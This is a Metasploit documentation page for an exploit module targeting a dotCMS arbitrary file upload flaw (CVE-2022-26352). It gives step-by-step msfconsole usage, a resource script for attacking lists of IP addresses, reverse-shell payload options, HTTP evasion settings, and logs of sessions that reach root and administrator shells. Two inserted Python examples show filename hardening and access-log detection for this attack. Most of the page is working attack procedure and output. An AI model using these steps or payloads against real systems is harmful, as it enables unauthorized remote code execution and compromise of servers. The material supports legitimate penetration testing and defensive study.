DotCMS RCE via Arbitrary File Upload. - Metasploit
This page contains detailed information about how to use the exploit/multi/http/dotcms_file_upload_rce metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Description
- Clone and build a vulnerable version of dotCMS:
- Ubuntu 20.04 install
- Install JAVA 1.8
- Install Postgres
- Install Elastic Search
- Run dotCMS
- Windows 10 install
- Install Java 1.8
- Install Elasticsearch 8.2.0
- Install Postgres 10.21
- Run dotCMS
- Verification Steps
- Scenarios
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: DotCMS RCE via Arbitrary File Upload.
Module: exploit/multi/http/dotcms_file_upload_rce
Source code: modules/exploits/multi/http/dotcms_file_upload_rce.rb
Disclosure date: 2022-05-03
Last modification time: 2022-06-01 10:54:02 +0000
Supported architecture(s): -
Supported platform(s): Linux, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-26352
When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temp file's name. This allows a specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content) that get written outside of the dotCMS temp directory. In the case of this exploit, an attacker can upload a special .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
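The root cause described above is a client-supplied multipart filename being joined onto the temp directory without validation. The following added example (not dotCMS or Metasploit code) contrasts that naive join with one common hardening, a base-name reduction plus containment check; the function names, the temp directory and the sample header are constructed for illustration.

```python
import os
import re
import tempfile
from email.message import Message


def filename_from_disposition(header_value):
    """Extract the filename parameter from a multipart Content-Disposition value."""
    msg = Message()
    msg["Content-Disposition"] = header_value
    return msg.get_filename()


def naive_temp_path(temp_dir, filename):
    """Vulnerable pattern: treat the client-supplied name as a trusted relative path."""
    return os.path.normpath(os.path.join(temp_dir, filename))


def escapes_temp_dir(temp_dir, filename):
    """Detection helper: would the naive join land outside temp_dir?"""
    root = os.path.abspath(temp_dir)
    # Normalise Windows separators so the check behaves the same on any host OS.
    naive = naive_temp_path(root, filename.replace("\\", "/"))
    return os.path.commonpath([root, naive]) != root


def safe_temp_path(temp_dir, filename):
    """Hardened pattern: keep only the base name, then verify containment."""
    if not filename or "\x00" in filename:
        raise ValueError("missing or malformed filename")
    # Split on both separators, whatever the host OS uses.
    base = re.split(r"[\\/]", filename)[-1]
    if base in ("", ".", ".."):
        raise ValueError("filename has no usable base name")
    root = os.path.realpath(temp_dir)
    candidate = os.path.realpath(os.path.join(root, base))
    # Defence in depth: the resolved path must still sit under the temp root
    # (this also catches a symlink planted inside the temp directory).
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path escapes the temp directory")
    return candidate


if __name__ == "__main__":
    # Constructed sample header, not taken from a real request.
    header = 'form-data; name="file"; filename="../outside/report.jsp"'
    temp_dir = os.path.realpath(tempfile.mkdtemp())  # stand-in for the upload temp dir
    name = filename_from_disposition(header)
    print("client filename :", name)
    print("naive join      :", naive_temp_path(temp_dir, name))
    print("escapes temp dir:", escapes_temp_dir(temp_dir, name))
    print("hardened path   :", safe_temp_path(temp_dir, name))
```

The same `escapes_temp_dir` check can be applied to filenames captured by a WAF or reverse proxy to flag upload requests whose part name resolves outside the intended directory.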
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Using dotcms_file_upload_rce against a single host
Normally, you can use exploit/multi/http/dotcms_file_upload_rce this way:
msf > use exploit/multi/http/dotcms_file_upload_rce
msf exploit(dotcms_file_upload_rce) > show targets
... a list of targets ...
msf exploit(dotcms_file_upload_rce) > set TARGET target-id
msf exploit(dotcms_file_upload_rce) > show options
... show and set options ...
msf exploit(dotcms_file_upload_rce) > exploit
Using dotcms_file_upload_rce against multiple hosts
This is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your dotcms_file_upload_rce will be using:
- Do: use exploit/multi/handler
- Do: set PAYLOAD [payload]
- Set other options required by the payload
- Do: set EXITONSESSION false
- Do: run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/dotcms_file_upload_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")
  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")
  run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Description
This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each respective stream. The module uploads a JSP payload to the Tomcat ROOT directory and accesses it to trigger its execution.
Clone and build a vulnerable version of dotCMS:
This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
1. git clone https://github.com/dotCMS/core.git
2. cd core
3. git checkout 7d604e5 (this is vulnerable version 21.06)
4. cd dotCMS/
5. ./gradlew createDist
Starting a Gradle Daemon (subsequent builds will be faster)
<output truncated>
BUILD SUCCESSFUL in 12m 53s
21 actionable tasks: 19 executed, 2 up-to-date
If the build was successful you should now have a vulnerable 21.06 Linux and Windows instance:
msfuser@ubuntu:~/core/dotCMS$ ls -l ../dist-output/
total 811132
-rw-rw-r-- 1 msfuser msfuser 413134562 May 20 10:22 dotcms_21.06.tar.gz
-rw-rw-r-- 1 msfuser msfuser 417462181 May 20 10:24 dotcms_21.06.zip
Inside each of the above compressed directories exists a directory dotserver which contains the vulnerable app.
Ubuntu 20.04 install
Install JAVA 1.8
export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"
export PATH=$JAVA_HOME/bin:$PATH
sudo apt-get install openjdk-8-jdk
Install Postgres
sudo apt install postgresql -y
sudo -u postgres psql
- Change the default database, username and password from dotcms to postgres (or create the db and user dotcms).
vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/db.properties
##Postgres default configuration
driverClassName=org.postgresql.Driver
jdbcUrl=jdbc:postgresql://localhost/postgres
username=postgres
password=postgres
Install Elastic Search
sudo apt install apt-transport-https ca-certificates wget
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
sudo sh -c 'echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" > /etc/apt/sources.list.d/elastic-7.x.list'
sudo apt update
sudo apt install elasticsearch
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service
sudo systemctl start elasticsearch.service
sudo systemctl status elasticsearch.service
- Edit dotcms-config-cluster.properties to ensure the following properties are set:
vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/dotcms-config-cluster.properties
ES_ENDPOINTS=http://localhost:9200
ES_PROTOCOL=http
ES_HOSTNAME=localhost
ES_PORT=9200
ES_TLS_ENABLED=false
Run dotCMS
cd dotserver/tomcat-9.0.41/bin/
chmod 755 *.sh
catalina.sh run
- Test the server is up with:
curl -vk localhost:8080/dotAdmin/
Windows 10 install
Install Java 1.8
- Download and follow wizard to install: https://www.oracle.com/java/technologies/downloads/#license-lightbox
Install Elasticsearch 8.2.0
- Download and follow wizard to install: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.2.0-windows-x86_64.zip
- Ensure dotcms-config-cluster.properties contains the same properties as specified above
Install Postgres 10.21
- Download and follow wizard to install: https://www.enterprisedb.com/postgresql-tutorial-resources-training?uuid=ea5c8104-3940-4ed1-b427-81cf19781581&campaignId=70138000000rYFmAAM
- Ensure db.properties contains the same properties as specified above
Run dotCMS
cd dotserver\tomcat-9.0.41\bin\
catalina.bat run
- Test the server is up with:
curl -vk localhost:8080/dotAdmin/
Verification Steps
use multi/http/dotcms_file_upload_rce
set RHOSTS [ips]
set LHOST [ips]
run
Scenarios
Ubuntu 20.04 dotCMS 21.06:
msf6 > use exploit/multi/http/dotcms_file_upload_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
rhosts => 172.16.199.227
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Windows 10 dotCMS 21.06:
msf6 > use dotcms_file_upload_rce
[*] Using exploit/multi/http/dotcms_file_upload_rce
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.231
rhosts => 172.16.199.231
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[!] Tried to delete ../webapps/ROOT/AkqMhxCZWr.jsp, unknown result
[!] Tried to delete ../webapps/ROOT/xdPfn9JTdu33X.jsp, unknown result
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.231:50016) at 2022-05-20 12:41:36 -0400
Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.
-----
C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>whoami
whoami
desktop-h1lncdm\administrator
C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>systeminfo
systeminfo
Host Name: DESKTOP-H1LNCDM
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
<output truncated>
Note: on Windows the module reports an unknown result when trying to delete the files, though it does delete them successfully.
Msfconsole Usage
Here is how the multi/http/dotcms_file_upload_rce exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/dotcms_file_upload_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/dotcms_file_upload_rce) > show info
Name: DotCMS RCE via Arbitrary File Upload.
Module: exploit/multi/http/dotcms_file_upload_rce
Platform: Linux, Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-05-03
Provided by:
Shubham Shah
Hussein Daher
jheysel-r7
Module side effects:
artifacts-on-disk
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Java Linux
1 Java Windows
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS yes The target host(s), see https://github.com/rapid7/metaspl
oit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload information:
Description:
When files are uploaded into dotCMS via the content API, but before
they become content, dotCMS writes the file down in a temp
directory. In the case of this vulnerability, dotCMS does not
sanitize the filename passed in via the multipart request header and
thus does not sanitize the temp file's name. This allows a specially
crafted request to POST files to dotCMS via the ContentResource
(POST /api/content) that get written outside of the dotCMS temp
directory. In the case of this exploit, an attacker can upload a
special .jsp file to the webapp/ROOT directory of dotCMS which can
allow for remote code execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-26352
https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
Module Options
This is a complete list of options available in the multi/http/dotcms_file_upload_rce exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show options
Module options (exploit/multi/http/dotcms_file_upload_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasp
loit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Java Linux
Advanced Options
Here is a complete list of advanced options supported by the multi/http/dotcms_file_upload_rce exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show advanced
Module advanced options (exploit/multi/http/dotcms_file_upload_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possi
bility of cleaning up files
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains c
ontext information
DOMAIN WORKSTATION yes The domain to use for Windows authen
tication
DigestAuthIIS true no Conform to IIS, should work for most
servers. Only set to false for non-
IIS servers
DisablePayloadHandler false no Disable the handler code for the sel
ected payload
EnableContextEncoding false no Use transient context when encoding
payloads
FileDropperDelay no Delay in seconds before attempting c
leanup
FingerprintCheck true no Conduct a pre-exploit fingerprint ve
rification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for aut
hentication
HttpRawHeaders no Path to ERB-templatized raw headers
to append to existing headers
HttpTrace false no Show the raw HTTP requests and respo
nses
HttpTraceColors red/blu no HTTP request and response colors for
HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for aut
hentication
SSLServerNameIndicatio no SSL/TLS Server Name Indication (SNI)
n
SSLVersion Auto yes Specify the version of SSL/TLS to be
used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (iPad; CPU no The User-Agent header to use for all
OS 15_3_1 like Mac OS requests
X) AppleWebKit/605.1.
15 (KHTML, like Gecko)
Version/15.2 Mobile/1
5E148 Safari/604.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this modul
e
WfsDelay 2 no Additional delay in seconds to wait
for a session
Payload advanced options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session cr
eation.
AutoVerifySession true yes Automatically verify and drop invalid sessi
ons
CommandShellCleanupCom no A command to run before the session is clos
mand ed
CreateSession true no Create a new session for every successful l
ogin
InitialAutoRunScript no An initial script to run on session creatio
n (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specifi
ed. Connect back will NOT go through proxy
but directly to LHOST
ReverseListenerBindAdd no The specific IP address to bind to on the l
ress ocal system
ReverseListenerBindPor no The port to bind to on the local system if
t different from LPORT
ReverseListenerComm no The specific communication channel to use f
or this listener
ReverseListenerThreade false yes Handle every connection in a new thread (ex
d perimental)
StagerRetryCount 10 no The number of times the stager should retry
if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager be
tween reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/dotcms_file_upload_rce module can exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Java Linux
1 Java Windows
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/dotcms_file_upload_rce exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
5 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/dotcms_file_upload_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/dotcms_file_upload_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_ca false no Use random casing for the HTTP method
se
HTTP::method_random_in false no Use a random invalid, HTTP method for reque
valid st
HTTP::method_random_va false no Use a random, but valid, HTTP method for re
lid quest
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP r
equest
HTTP::pad_fake_headers 0 no How many fake headers to insert into the HT
_count TP request
HTTP::pad_get_params false no Insert random, fake query string variables
into the request
HTTP::pad_get_params_c 16 no How many fake query string variables to ins
ount ert into the request
HTTP::pad_method_uri_c 1 no How many whitespace characters to use betwe
ount en the method and uri
HTTP::pad_method_uri_t space no What type of whitespace to use between the
ype method and uri (Accepted: space, tab, apach
e)
HTTP::pad_post_params false no Insert random, fake post variables into the
request
HTTP::pad_post_params_ 16 no How many fake post variables to insert into
count the request
HTTP::pad_uri_version_ 1 no How many whitespace characters to use betwe
count en the uri and version
HTTP::pad_uri_version_ space no What type of whitespace to use between the
type uri and version (Accepted: space, tab, apac
he)
HTTP::uri_dir_fake_rel false no Insert fake relative directories into the u
ative ri
HTTP::uri_dir_self_ref false no Insert self-referential directories into th
erence e uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-no
rmal, hex-noslashes, hex-random, hex-all, u
-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../
../)
HTTP::uri_fake_params_ false no Add a fake start of params to the URI (eg:
start /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslas false no Use back slashes instead of forward slashes
hes in the uri
HTTP::version_random_i false no Use a random invalid, HTTP version for requ
nvalid est
HTTP::version_random_v false no Use a random, but valid, HTTP version for r
alid equest
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to write JSP payload
Here is a relevant code snippet related to the "Failed to write JSP payload" error message:
      'uri' => normalize_uri(target_uri.path, '/api/content/'),
      'vars_form_data' => vars_form_data
    )

    unless res&.code == 500
      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
    end

    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
    print_good('Successfully wrote JSP payload')
  end
Failed to execute JSP payload
Here is a relevant code snippet related to the "Failed to execute JSP payload" error message:
      'method' => 'GET',
      'uri' => jsp_uri
    )

    unless res&.code == 200
      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
    end
    print_good('Successfully executed JSP payload')
  end

  def exploit
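The two status checks in the snippets above (HTTP 500 on the POST to /api/content/, then HTTP 200 on the GET of the JSP) give defenders a sequence to hunt for in access logs, matching the module's ioc-in-logs side effect. The following added example (not part of the module) correlates the two events per client; the log format (Tomcat common pattern), the 5-minute window, the root-level JSP assumption and the sample lines are all constructed.

```python
import re
from datetime import datetime, timedelta

# Assumes the Tomcat "common" access log pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A JSP requested directly from the web root (assumes dotCMS is served at "/").
ROOT_JSP_RE = re.compile(r'^/[^/?]+\.jsp(?:[?;].*)?$', re.IGNORECASE)
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Constructed sample lines using documentation-range addresses.
SAMPLE_LOG = """
192.0.2.10 - - [20/May/2022:15:01:24 -0400] "POST /api/content/ HTTP/1.1" 500 312
192.0.2.10 - - [20/May/2022:15:01:25 -0400] "GET /qzkexample.jsp HTTP/1.1" 200 -
192.0.2.44 - - [20/May/2022:15:03:00 -0400] "POST /api/content/ HTTP/1.1" 200 845
192.0.2.44 - - [20/May/2022:15:03:02 -0400] "GET /dotAdmin/ HTTP/1.1" 200 5120
192.0.2.77 - - [20/May/2022:15:10:00 -0400] "POST /api/content/ HTTP/1.1" 500 312
192.0.2.77 - - [20/May/2022:16:30:00 -0400] "GET /status.jsp HTTP/1.1" 200 -
"""


def parse(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def find_upload_then_jsp(lines, window=WINDOW):
    """Flag a 500 on POST /api/content followed by a 200 on a root-level JSP."""
    pending = {}  # client ip -> time of its latest POST /api/content answered with 500
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        clean = path.split("?", 1)[0].rstrip("/")
        if method == "POST" and clean.endswith("/api/content") and status == 500:
            pending[ip] = ts
        elif method == "GET" and status == 200 and ROOT_JSP_RE.match(path):
            start = pending.get(ip)
            if start is not None and timedelta(0) <= ts - start <= window:
                hits.append({"client": ip, "upload": start, "jsp": path, "executed": ts})
    return hits


if __name__ == "__main__":
    for hit in find_upload_then_jsp(SAMPLE_LOG.strip().splitlines()):
        print(f'{hit["client"]}: POST /api/content 500 at {hit["upload"]}, '
              f'then GET {hit["jsp"]} 200 at {hit["executed"]}')
```

A hit is a lead rather than proof: pair it with a listing of unexpected .jsp files under webapps/ROOT, since the module's cleanup may already have removed the uploaded file.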
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
See Also
Check also the following modules related to this module:
- exploit/multi/http/apache_jetspeed_file_upload
- exploit/multi/http/bolt_file_upload
- exploit/multi/http/clipbucket_fileupload_exec
- exploit/multi/http/coldfusion_ckeditor_file_upload
- exploit/multi/http/eventlog_file_upload
- exploit/multi/http/gitlab_file_read_rce
- exploit/multi/http/horde_form_file_upload
- exploit/multi/http/hp_sitescope_uploadfileshandler
- exploit/multi/http/jboss_deploymentfilerepository
- exploit/multi/http/monstra_fileupload_exec
- exploit/multi/http/nibbleblog_file_upload
- exploit/multi/http/opmanager_socialit_file_upload
- exploit/multi/http/oracle_ats_file_upload
- exploit/multi/http/phpfilemanager_rce
- exploit/multi/http/playsms_filename_exec
- exploit/multi/http/rocket_servergraph_file_requestor_rce
- exploit/multi/http/sit_file_upload
- exploit/multi/http/sysaid_auth_file_upload
- exploit/multi/http/sysaid_rdslogs_file_upload
- exploit/multi/http/uptime_file_upload_1
- exploit/multi/http/uptime_file_upload_2
- exploit/multi/http/webnms_file_upload
- exploit/multi/http/wp_dnd_mul_file_rce
- exploit/multi/http/wp_file_manager_rce
- exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- exploit/multi/http/wp_simple_file_list_rce
- exploit/multi/http/wso2_file_upload_rce
Authors
- Shubham Shah
- Hussein Daher
- jheysel-r7
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.